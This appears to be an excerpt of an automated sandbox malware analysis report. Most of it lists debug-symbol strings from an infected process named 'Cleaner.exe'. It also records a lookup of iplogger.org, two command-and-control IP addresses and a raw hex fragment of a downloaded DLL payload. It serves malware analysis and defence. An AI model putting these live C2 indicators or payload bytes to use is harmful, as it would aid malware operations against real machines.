                  Source: Binary string: kernel32.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shell32.pdb0 source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.PDB source: Cleaner.exe, 00000018.00000000.597173230.0000014377C1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb source: WerFault.exe, 00000020.00000003.603811328.000001E430654000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.602165213.000001E430654000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: iphlpapi.pdb5 source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.ni.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb22k source: WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rpcrt4.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shlwapi.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: apphelp.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 00000020.00000003.621032216.000001E43112E000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: combase.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: user32.pdbK source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: powrprof.pdb? source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mswsock.pdbT source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: sechost.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rsaenh.pdbS source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: oleaut32.pdb9 source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winhttp.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdbTT source: WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Cleaner.exe, 00000018.00000000.597089823.0000014377C10000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rtutils.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoreei.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdi32.pdb source: WerFault.exe, 00000020.00000003.621394438.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621252876.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620458409.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clr.pdbB source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc.pdb^ source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: Cleaner.exe, 00000018.00000000.579357284.0000014373834000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoreei.pdb0 source: WerFault.exe, 00000020.00000003.601486906.000001E43067A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600318897.000001E43067A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clrjit.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DWrite.pdbS source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cfgmgr32.pdbo source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcrypt.pdbT source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasman.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: fltLib.pdbi source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoree.pdb0 source: WerFault.exe, 00000020.00000003.602098493.000001E430647000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600066159.000001E430647000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.ni.pdbr source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: msctf.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoree.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb%r source: Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: user32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: diasymreader.pdbC source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000020.00000003.621032216.000001E43112E000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: psapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rtutils.pdbo source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdbt source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: msctf.pdb( source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000020.00000003.601486906.000001E43067A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600318897.000001E43067A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdbo source: WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: WerFault.exe, 00000020.00000003.620436247.000001E431116000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620402333.000001E431112000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.605731171.000001E430641000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe, 00000000.00000000.378733488.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                  Source: Binary string: System.Core.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: diasymreader.pdb0 source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe, 00000000.00000000.378733488.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                  Source: Binary string: comctl32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WerFault.exe, 00000020.00000003.600768010.000001E4306F9000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: IconCodecService.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp

                  Networking

                  barindex
                  May check the online IP address of the machine
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeDNS query: name: iplogger.org
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 208.67.104.97
                  Source: Malware configuration extractorIPs: 85.31.46.167
                  Source: Joe Sandbox ViewASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
                  Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                  Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:20:17 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
